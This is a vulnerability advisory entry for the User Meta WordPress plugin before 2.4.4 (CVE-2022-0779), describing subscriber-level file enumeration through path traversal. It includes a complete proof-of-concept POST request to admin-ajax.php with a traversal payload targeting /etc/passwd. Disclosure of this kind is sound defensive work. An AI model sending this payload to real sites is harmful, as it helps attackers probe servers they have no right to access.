Lucene search
WpvulndbWPEX-ID:9D4A3F09-B011-4D87-AB63-332E505CF1CDHistoryMay 16, 2022 - 12:00 a.m.
User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal
2022-05-1600:00:00
wpvulndb
80
subscriber
local file enumeration
path traversal
intercept request
file path parameter
admin ajax.
EPSS
0.001
Percentile
37.4%
The plugin does not validate the filepath parameter of its um_show_uploaded_file AJAX action, which could allow low privileged users such as subscriber to enumerate the local files on the web server via path traversal payloads
As a subscriber, submit a dummy image on a page/post with a File Upload field is embed, intercept the request and change the file path parameter
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 158
Connection: close
Cookie: [subscriber+]
field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=4286c1c56a&is_ajax=true
If the response contains the um_remove_file, then the file exist on the server, otherwise it does notRelated
cnvd
cnvd
WordPress User Meta Manager plugin path traversal vulnerability
2022-06-01 00:00:00
prion
prion
Path traversal
2022-06-08 10:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-0779
2022-06-08 10:15:09
patchstack
patchstack
zdt
zdt
WordPress User Meta Lite / Pro 2.4.3 Path Traversal Vulnerability
2022-05-31 00:00:00
wpvulndb
wpvulndb
User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal
2022-05-16 00:00:00
packetstorm
packetstorm
WordPress User Meta Lite / Pro 2.4.3 Path Traversal
2022-05-30 00:00:00
cve
cve
CVE-2022-0779
2022-06-08 10:15:09